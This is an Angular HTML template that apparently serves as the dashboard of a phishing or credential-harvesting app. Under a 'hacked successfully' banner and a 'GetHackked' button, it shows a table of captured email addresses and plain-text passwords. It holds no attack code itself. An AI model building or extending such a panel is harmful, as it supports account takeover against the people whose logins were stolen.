<div class="card my-5">
  <div class="card-body">
    <div class="row">
      <div class="col-md-2">
        <div class="form-group">
          <button type="submit" class="btn btn-secondary btn-block">GetHackked</button>
        </div>
      </div>

      <div class="col-md-6">
        <marquee behavior="right" direction=""><b style="color: red;letter-spacing: 10px;word-spacing: 20px;">The
            Following Account have
            been
            hacked
            successfully</b></marquee>
      </div>

      <div class="col-md-2">

      </div>

      <div class="col-md-2">
        <div class="form-group">
          <button (click)="goback()" class="ui right floated primary button mt-3">
            <i class="reply icon"></i>
            Back
          </button>
        </div>
      </div>
    </div>
    <div class="ui segment">
      <table class="ui blue table">
        <thead>
          <tr>
            <th scope="col">#</th>
            <th scope="col">Email</th>
            <th scope="col">Password</th>
            <th scope="col">Action</th>
          </tr>
        </thead>
        <tbody>
          <tr *ngFor="let flint of flintList;let i=index">
            <td>{{i+1}}</td>
            <td>{{ flint.email }}</td>
            <td>{{ flint.password }}</td>
            <td>
              <i class="fa fa-trash ml-2" aria-hidden="true" style="color:red;" (click)="deleteflint(flint.id)">
              </i></td>
          </tr>
        </tbody>
      </table>
    </div>

  </div>
</div>
